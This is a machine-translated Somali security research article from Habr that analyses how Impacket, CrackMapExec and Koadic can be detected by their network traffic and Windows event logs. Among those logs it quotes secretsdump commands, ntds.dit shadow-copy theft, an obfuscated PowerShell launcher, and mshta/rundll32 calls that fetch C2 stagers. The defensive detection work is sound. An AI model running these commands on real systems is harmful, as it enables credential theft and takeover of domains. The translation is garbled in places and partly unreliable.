Tirada weerarrada ee qaybta shirkadaha ayaa sii kordhaya sannad kasta: tusaale ahaan marka loo eego 2016, iyo dhamaadka 2018 - marka loo eego xilligii hore. Oo ay ku jiraan kuwa meesha ugu muhiimsan ee qalabku yahay nidaamka hawlgalka Windows. 2017-2018, APT Dragonfly, APT28, weerarro lagu qaaday hay’ado dawladeed iyo kuwo ciidan oo ku yaalla Yurub, Waqooyiga Ameerika iyo Sucuudiga. Taasna waxaan u isticmaalnay saddex qalab - , и . Koodhkooda isha ayaa furan oo laga heli karaa GitHub.
Waxaa habboon in la ogaado in qalabkan aan loo isticmaalin gelitaanka bilowga ah, laakiin si loo horumariyo weerarka gudaha kaabayaasha. Weeraryahanadu waxay u adeegsadaan marxaladaha kala duwan ee weerarka ka dib gelitaanka wareegga. Tani, habka, way adagtahay in la ogaado oo inta badan kaliya iyadoo la kaashanayo tignoolajiyada ama qalab ogolaanaya . Qalabku waxay bixiyaan hawlo kala duwan, laga bilaabo wareejinta faylasha ilaa la falgalka diiwaanka iyo fulinta amarada mashiinka fog. Waxaan samaynay daraasad ku saabsan qalabkan si aan u go'aamino dhaqdhaqaaqa shabakadooda.
Waxaan u baahanahay inaan sameyno:
- Faham sida aaladaha jabsiga u shaqeeyaan. Soo ogow waxa weeraryahanadu u baahan yihiin inay ka faa'iidaystaan iyo teknoolajiyada ay isticmaali karaan.
- Soo hel waxa aan lagu ogaan aaladaha amniga macluumaadka marxaladaha ugu horreeya ee weerarka. Marxaladda sahanka ayaa laga yaabaa in laga boodo, sababtoo ah weeraryahanku waa weeraryahan gudaha ah, ama sababtoo ah weeraryahanku wuxuu ka faa'iideysanayaa dalool kaabayaasha ah oo aan hore loo aqoon. Waxay noqotaa suurtagal in dib loo soo celiyo dhammaan silsiladda ficilladiisa, markaa rabitaanka ah in la ogaado dhaqdhaqaaq dheeraad ah.
- Ka saar waxyaabaha been abuurka ah ee ka yimaadda aaladaha lagu ogaado soo gelitaanka. Waa in aynaan iloobin in marka ficilada qaarkood la ogaado iyada oo ku saleysan sahan kaliya, khaladaad joogto ah ayaa suurtagal ah. Caadi ahaan kaabayaasha waxaa jira tiro ku filan oo siyaabo ah, oo aan laga sooci karin kuwa sharciga ah jaleecada hore, si loo helo macluumaad kasta.
Maxay qalabkani siinayaan weeraryahannada? Haddii ay tani tahay Impacket, markaas weerarayaashu waxay helayaan maktabad weyn oo cutubyo ah oo loo isticmaali karo marxaladaha kala duwan ee weerarka ee soo socda ka dib jebinta wareegga. Aalado badan ayaa isticmaala modules Impacket gudaha - tusaale ahaan, Metasploit. Waxay leedahay dcomexec iyo wmiexec ee fulinta amarka fog, sirtada si ay xisaabaadka uga helaan xusuusta oo lagu daro Impacket. Natiijo ahaan, ogaanshaha saxda ah ee dhaqdhaqaaqa maktabadda noocan oo kale ah waxay xaqiijin doontaa ogaanshaha asalka.
Ma ahan wax iska dhacay in hal-abuurayaashu ay wax ka qoreen "Powered by Impacket" oo ku saabsan CrackMapExec (ama si fudud CME). Intaa waxaa dheer, CME waxay leedahay shaqeyn diyaarsan oo loogu talagalay xaaladaha caanka ah: Mimikatz ee helitaanka ereyada sirta ah ama xashiishadooda, hirgelinta Meterpreter ama wakiilka Boqortooyada ee fulinta fog, iyo Bloodhound oo saaran.
Qalabka saddexaad ee aan dooranay wuxuu ahaa Koadic. Waa wax aad u dhow, waxaa lagu soo bandhigay shirka caalamiga ah ee hackers DEFCON 25 ee 2017 waxaana lagu kala soocaa hab aan caadi ahayn: waxay ka shaqeysaa HTTP, Java Script iyo Microsoft Visual Basic Script (VBS). Habkan waxaa loo yaqaan ku noolaanshaha dhulka: qalabku wuxuu isticmaalaa tiro ku-tiirsanaan iyo maktabado lagu dhisay Windows. Abuurayaashu waxay ugu yeeraan COM Command & Control, ama C3.
IMPACKET
Shaqada Impacket waa mid aad u ballaaran, oo u dhexeysa sahanka gudaha AD iyo aruurinta xogta gudaha gudaha MS SQL servers, si ay u noqoto farsamooyinka lagu helo aqoonsiga: kani waa weerar celinta SMB, iyo helitaanka faylka ntds.dit ee ka kooban xashiishka isticmaalaha sirta ah ee maamulaha domain. Impacket waxa kale oo uu fuliyaa amarada fog isagoo isticmaalaya afar hab oo kala duwan: WMI, Adeegga Maaraynta Jadwalaha Windows, DCOM, iyo SMB, wuxuuna u baahan yahay aqoonsi si loo sameeyo.
Qarsoon
Bal aynu eegno siraha. Kani waa cutub bartilmaameedsan kara mashiinnada isticmaalaha iyo kontaroolayaasha domain labadaba. Waxaa loo isticmaali karaa in lagu helo nuqullada meelaha xusuusta LSA, SAM, SECURITY, NTDS.dit, si loo arko marxaladaha kala duwan ee weerarka. Talaabada ugu horeysa ee hawlgalka moduleka waa xaqiijinta iyada oo loo marayo SMB, taas oo u baahan in la isticmaalo erayga sirta ah ama xashiishkiisa si uu si toos ah u fuliyo Gudbitaanka weerarka Hash. Marka xigta waxaa yimaada codsi ah in la furo gelitaanka Maareeyaha Xakamaynta Adeegga (SCM) oo aad gasho diiwaanka iyada oo loo marayo borotokoolka winreg, kaas oo uu isticmaalo weeraryahanku uu ku ogaan karo xogta laamaha xiisaha oo uu natiijooyinka ku helo SMB.
Jaantuska 1 waxaan aragnaa sida saxda ah marka la isticmaalayo borotokoolka winreg, gelitaanka lagu helo iyadoo la adeegsanayo furaha diiwaanka ee LSA. Si tan loo sameeyo, isticmaal amarka DCERPC oo wata opcode 15 - OpenKey.
Bariis 1. Furitaanka furaha diiwaanka iyadoo la adeegsanayo borotokoolka winreg
Marka xigta, marka gelitaanka furaha la helo, qiyamka waxaa lagu keydiyaa amarka SaveKey oo leh opcode 20. Impacket wuxuu tan u sameeyaa si gaar ah. Waxay ku kaydinaysaa qiyamka faylka magaciisa uu yahay xadhig ka kooban 8 xaraf oo random oo ku lifaaqan .tmp. Intaa waxaa dheer, galitaanka dheeraadka ah ee faylkan wuxuu ku dhacaa SMB ee hagaha System32 (Jaantus. 2).
Bariis 2. Qorshaha helitaanka furaha diiwaangelinta mashiinka fog
Waxaa soo baxday in dhaqdhaqaaqa noocan oo kale ah ee shabakada lagu ogaan karo su'aalo la xidhiidha laamaha diiwaanka qaarkood oo isticmaalaya nidaamka winreg, magacyo gaar ah, amarro iyo amarkooda.
Qaybtani waxa kale oo ay ka tagtaa raadadka diiwaanka dhacdada Windows, taas oo sahlaysa in la ogaado. Tusaale ahaan, natiijada fulinta amarka
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCDiiwaanka Windows Server 2016 waxaan ku arki doonaa dhacdooyinka taxanaha ah ee soo socda:
1. 4624 - Logon fog.
2 - hubinta xuquuqda gelitaanka adeegga fogaanta ee winreg.
3 - hubinta xuquuqda gelitaanka faylka ee hagaha System5145. Faylku wuxuu leeyahay magac random ah oo aan kor ku soo sheegnay.
4 - abuurista habka cmd.exe ee bilaabaya vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - abuurista nidaam leh amarka:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - abuurista nidaam leh amarka:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - abuurista nidaam leh amarka:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Sida qalabyo badan oo ka faa'iidaysiga kadib, Impacket waxa uu leeyahay qaybo meel fog lagu fuliyo amarada. Waxaan diiradda saari doonaa smbexec, kaas oo bixiya qolof amar is-dhexgal ah oo ku saabsan mishiinka fog. Qaybtani waxa kale oo ay u baahan tahay in lagu xaqiijiyo SMB, ha ahaato furaha sirta ah ama hash sirta ah. Jaantuska Jaantuska 3 waxaan ku aragnaa tusaale ku saabsan sida qalabku u shaqeeyo, kiiskan waa console maamulaha deegaanka.
Bariis 3. Console smbexec Interactive
Talaabada ugu horeysa ee smbexec ka dib xaqiijinta waa in la furo SCM oo leh amarka OpenSCManagerW (15). Weydiinta waa mid xusid mudan: goobta MachineName waa DUMMY.
Bariis 4. Codso inaad furto Maareeyaha Xakamaynta Adeegga
Marka xigta, adeegga waxaa la abuuray iyadoo la adeegsanayo amarka CreateServiceW (12). In the case of smbexec, waxaan arki karnaa isla amar dhismaha macquulka ah mar kasta. Jaantuska 5 cagaarka ah wuxuu muujinayaa xuduudaha amarka aan la bedeli karin, jaalaha ayaa tilmaamaya waxa weeraryahanku bedeli karo. Way fududahay in la arko in magaca faylka la fulin karo, hagaha iyo faylka wax soo saarka la bedeli karo, laakiin inta soo hartay aad bay u adag tahay in la beddelo iyada oo aan la carqaladayn macquulnimada moduleka Impacket.
Bariis 5. Codso inaad abuurto adeeg adoo isticmaalaya Maareeyaha Xakamaynta Adeegga
Smbexec sidoo kale waxay ka tagtaa raadad cad oo ku jira diiwaanka dhacdada Windows. Gudaha Windows Server 2016 ee loogu talagalay qolofka amarka is-dhexgalka leh ee amarka ipconfig, waxaan arki doonaa dhacdooyinka taxanaha ah ee soo socda:
1 - Ku rakibida adeegga mashiinka dhibbanaha:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - abuurista habka cmd.exe oo leh doodaha laga bilaabo barta 1.
3. 5145 - hubinta xuquuqda gelitaanka faylka __output ee ku jira tusaha C$.
4. 4697 - Ku rakibida adeegga mashiinka dhibbanaha.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - abuurista habka cmd.exe oo leh doodaha laga bilaabo barta 4.
6. 5145 - hubinta xuquuqda gelitaanka faylka __output ee ku jira tusaha C$.
Impacket waa saldhigga horumarinta qalabka weerarka. Waxay taageertaa ku dhawaad dhammaan borotokoolka kaabayaasha Windows isla markaana waxay leedahay astaamo u gaar ah. Halkan waxaa ah codsiyo gaar ah oo winreg ah, iyo isticmaalka SCM API oo leh qaab amar sifo ah, iyo qaabka magaca faylka, iyo SMB wadaaga SYSTEM32.
CRACKMAPEXEC
Qalabka CME waxaa loogu talagalay in ugu horrayn si otomaatig ah loogu sameeyo ficillada caadiga ah ee ay tahay in weeraryahanku sameeyo si uu ugu hormaro shabakadda dhexdeeda. Waxay kuu ogolaanaysaa inaad la shaqeyso wakiilka caanka ah ee Boqortooyada iyo Meterpreter. Si loo fuliyo amarada si qarsoodi ah, CME way qarin kartaa iyaga. Isticmaalka Bloodhound (qalab sahamineed oo gooni ah), weeraryahan ayaa si otomaatig ah u samayn kara raadinta kalfadhiga maamulaha bogga firfircoon.
Bloodhound
Bloodhound, oo ah qalab gooni ah, ayaa u oggolaanaya sahan horumarsan gudaha shabakadda. Waxay uruurisaa xogta isticmaalayaasha, mishiinada, kooxaha, fadhiyada waxaana loo soo gudbiyaa sidii qoraalka PowerShell ama faylka binary. LDAP ama borotokool ku salaysan SMB ayaa loo isticmaalaa si loo ururiyo macluumaadka. Habka isdhexgalka ee CME wuxuu u oggolaanayaa Bloodhound in lagu soo dejiyo mashiinka dhibbanaha, ordo oo helo xogta la ururiyey ka dib fulinta, si otomaatig ah falalka nidaamka iyo ka dhigaya kuwo aan la dareemin. Qolofka garaafiga ah ee Bloodhound wuxuu soo bandhigayaa xogta la ururiyey ee qaabka garaafyada, kaas oo kuu ogolaanaya inaad hesho dariiqa ugu gaaban ee mashiinka weerarka ilaa maamulaha domainka.
Bariis 6. Interface Dhiiga
Si loogu shaqeeyo mishiinka dhibbanaha, moduleka wuxuu abuuraa hawl isagoo isticmaalaya ATSVC iyo SMB. ATSVC waa isku xidhka la shaqaynta Jadwalka Hawsha Windows. CME waxay isticmaashaa shaqadeeda NetrJobAdd(1) si ay u abuurto hawlaha shabakada. Tusaalaha waxa moduleka CME soo diro waxa lagu muujiyay shaxanka. 7: Kani waa wicitaan amar cmd.exe ah iyo kood qarsoon oo qaab doodo ah oo qaab XML ah.
Jaantus.7. Abuuritaanka hawl iyada oo loo marayo CME
Ka dib marka hawsha loo gudbiyo fulinta, mishiinka dhibbanaha ayaa bilaaba Bloodhound laftiisa, taasna waxaa lagu arki karaa taraafikada. Qaabka waxaa lagu gartaa weydiimaha LDAP si loo helo kooxaha caadiga ah, liiska dhammaan mashiinada iyo isticmaalayaasha domainka, iyo in la helo macluumaadka ku saabsan fadhiyada isticmaale ee firfircoon iyada oo loo marayo codsiga SRVSVC NetSessEnum.
Bariis 8. Helitaanka liiska fadhiyada firfircoon ee SMB
Intaa waxa dheer, ku darista Bloodhound mishiinka dhibbanaha oo awood u leh hanti-dhawrku waxa weheliya dhacdo wadata ID 4688 (hab-abuurida) iyo magaca habraaca «C:WindowsSystem32cmd.exe». Waxa xusid mudan waa doodaha khadka taliska:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Qaybta enum_avproducts waa mid aad u xiiso badan marka loo eego aragtida shaqeynta iyo hirgelinta. WMI waxay kuu ogolaanaysaa inaad isticmaasho luuqada waydiinta WQL si aad xogta uga soo saarto shayyada kala duwan ee Windows, taas oo asal ahaan ah waxa modulekan CME uu isticmaalo. Waxay abuurtaa su'aalo ku saabsan fasallada AntiSpywareProduct iyo Anti-IrusProduct ee ku saabsan qalabka ilaalinta ee lagu rakibay mishiinka dhibbanaha. Si loo helo xogta lagama maarmaanka ah, moduleka wuxuu ku xiraa rootSecurityCenter2 namespace, ka dibna wuxuu soo saaraa weydiinta WQL wuxuuna helayaa jawaab. Jaantuska Jaantuska 9 waxa uu muujinayaa waxa ku jira codsiyada iyo jawaabaha. Tusaalahayaga, Windows Defender ayaa la helay.
Bariis 9. Hawlaha Network ee module enum_avproducts
Inta badan, xisaabinta WMI (Raadi WMI-Activity), kuwaas oo dhacdooyinkooda aad ka heli karto macluumaad faa'iido leh oo ku saabsan weydiimaha WQL, waxaa laga yaabaa inay naafo noqdaan. Laakin haddii la furo, markaas haddii qoraalka enum_avproducts la ordo, dhacdo leh ID 11 waa la keydin doonaa. Waxay ka koobnaan doontaa magaca isticmaalaha soo diray codsiga iyo magaca rootSecurityCenter2 namespace.
Mid kasta oo ka mid ah qaybaha CME waxay lahaayeen farshaxan u gaar ah, ha ahaato weydiimo gaar ah WQL ama abuurista hawl gaar ah oo ku jirta jadwal hawleed leh indho-indhayn iyo hawlo gaar ah oo Dhiigga ku jira LDAP iyo SMB.
KOADIC
Sifada gaarka ah ee Koadic waa isticmaalka JavaScript iyo VBScript turjumaanada lagu dhex dhisay Windows. Dareenkan, waxay raacaysaa nolosha ka baxsan isbeddelka dhulka - taas oo ah, ma laha ku tiirsanaanta dibadda waxayna isticmaashaa qalabka Windows caadiga ah. Tani waa qalab loogu talagalay Taliska & Xakamaynta buuxa (CnC), maadaama caabuqa ka dib "maqaar-galaha" lagu rakibay mashiinka, taas oo u oggolaanaysa in la xakameeyo. Mashiinka noocan oo kale ah, ereyada Koadic, waxaa loo yaqaan "zombie". Haddii ay jiraan mudnaan ku filan hawlgalka buuxa ee dhinaca dhibbanaha, Koadic wuxuu awood u leeyahay inuu kor u qaado iyaga oo isticmaalaya farsamooyinka Xakamaynta Koontada Isticmaalaha (UAC bypass).
Bariis 10. Koodic Shell
Dhibbanuhu waa in uu la bilaabo wada xidhiidhka Taliska & Xakamaynta server-ka. Si tan loo sameeyo, waxay u baahan tahay inay la xidhiidho URI hore loo diyaariyey oo ay hesho jidhka ugu muhiimsan ee Koadic iyadoo la isticmaalayo mid ka mid ah jaangooyooyinka. Jaantuska Jaantuska 11 waxa uu tusa tusaale u ah masraxa mshta
Bariis 11. Bilawga fadhiga serfarka CnC
Iyadoo lagu salaynayo doorsoomiyaha jawaabta WS, way caddaatay in fulintu ku dhacdo WScript.Shell, iyo doorsoomayaasha STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE waxay ka kooban yihiin macluumaad muhiim ah oo ku saabsan cabbiraadaha fadhiga hadda. Kani waa codsigii ugu horreeyay ee jawaabta codsiga ee ku xidhidh HTTP leh serfarka CnC. Codsiyada xiga waxay si toos ah ula xiriiraan shaqeynta modules-ka loo yaqaan (implants). Dhammaan qaybaha Koadic waxay la shaqeeyaan kaliya fadhi firfircoon oo leh CnC.
Mimikatz
Sida CME ula shaqeyso Bloodhound, Koadic wuxuu la shaqeeyaa Mimikatz barnaamij gaar ah oo wuxuu leeyahay siyaabo badan oo lagu bilaabo. Hoos waxaa ku yaal lamaane ka jawaab celin codsi ah oo soo dejinaya maqaar-galaha Mimikatz.
Bariis 12. Ku wareeji Mimikatz Koadic
Waxaad arki kartaa sida qaabka URI ee codsigu isu beddelay. Hadda waxa ay ka kooban tahay qiimaha doorsoomaha csrf, kaas oo ka mas'uul ah qaybta la doortay. Magaceeda ha u fiirsan; Dhammaanteen waan ognahay in CSRF inta badan loo fahmo si kala duwan. Jawaabtu waxay ahayd isla jidhka ugu muhiimsan ee Koadic, kaas oo koodka la xidhiidha Mimikatz lagu daray. Aad buu u weyn yahay, haddaba bal aan eegno qodobbada muhiimka ah. Halkan waxaan ku haynaa maktabadda Mimikatz oo lagu dhejiyay base64, fasalka .NET taxane ah oo duri doona, iyo doodaha lagu bilaabayo Mimikatz. Natiijada fulinta waxaa lagu kala qaadaa shabakada qoraal cad.
Bariis 13. Natiijada ku socodsiinta Mimikatz mashiinka fog
Exc_cmd
Koadic waxa kale oo uu leeyahay qaybo fulin kara amarada meel fog ka fog. Halkan waxaan ku arki doonaa isla habka jiilka URI iyo doorsoomayaasha sid iyo csrf ee la yaqaan. Xaaladda moduleka exec_cmd, koodhka ayaa lagu daraa jidhka kaas oo awood u leh fulinta amarrada qolofka. Hoos waxaa ku qoran koodka noocaas ah ee ku jira jawaabta HTTP ee serfarka CnC.
Bariis 14. Maqaarka koodhka exec_cmd
Doorsoome GAWTUUGCFI oo leh sifada WS ee la yaqaan ayaa looga baahan yahay fulinta koodka. Iyada oo ay caawimo, maqaar-galaha wac qolof, processing laba laamood ee code - shell.exec la soo noqoshada ee socodka xogta wax soo saarka iyo shell.run oo aan soo laaban.
Koadic ma aha qalab caadi ah, laakiin waxa ay leedahay farshaxan u gaar ah oo looga heli karo taraafikada sharciga ah:
- samaynta gaarka ah ee codsiyada HTTP,
- adoo isticmaalaya winHttpRequests API,
- abuurista shayga WScript.Shell iyada oo loo marayo ActiveXObject,
- jir weyn oo la fulin karo.
Xidhiidhka bilawga ah waxaa bilaabay masraxa, markaa waxaa suurtogal ah in lagu ogaado dhaqdhaqaaqiisa dhacdooyinka Windows. Mshta, tani waa dhacdo 4688, taas oo muujinaysa abuurista habraac leh sifada bilowga:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Inta Koadic uu socdo, waxaad arki kartaa 4688 dhacdo oo kale oo leh sifooyin si fiican u tilmaamaya:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1natiijooyinka
Nolosha ka baxsan dhulka ayaa caan ku noqonaysa dembiilayaasha dhexdooda. Waxay u isticmaalaan agabka iyo hababka lagu dhisay Daaqadaha baahidooda. Waxaan aragnaa aaladaha caanka ah ee Koadic, CrackMapExec iyo Impacket raacaya mabda'an oo si isa soo taraysa uga soo muuqday warbixinnada APT. Tirada fargeetooyinka GitHub ee qalabkan ayaa sidoo kale sii kordhaya, iyo kuwa cusub ayaa soo muuqda (waxaa jiray hadda ka hor kun kun). Isbeddelku wuxuu helayaa caan sababtoo ah fududaantiisa: weerarradu uma baahna qalab dhinac saddexaad ah; waxay mar hore ku jiraan mashiinnada dhibbanayaasha waxayna ka caawiyaan inay dhaafaan tallaabooyinka amniga. Waxaan diirada saareynaa barashada isgaarsiinta shabakada: qalab kasta oo kor lagu sharaxay wuxuu ka tagayaa raadkiisa taraafikada shabakada; daraasad faahfaahsan oo iyaga ku saabsan ayaa noo ogolaatay inaan baro alaabtayada ogaan iyaga, taas oo ugu dambeyntii caawisa in la baaro dhammaan silsiladaha dhacdooyinka internetka ee ku lug leh.
qorayaal:
- Anton Tyurin, Madaxa Waaxda Adeegyada Khabiirada, Xarunta Amniga Khabiirka PT, Teknolojiyadda Wanaagsan
- Egor Podmokov, khabiir, Xarunta Amniga Khabiirka PT, Teknolojiyadda Wanaagsan
Source: www.habr.com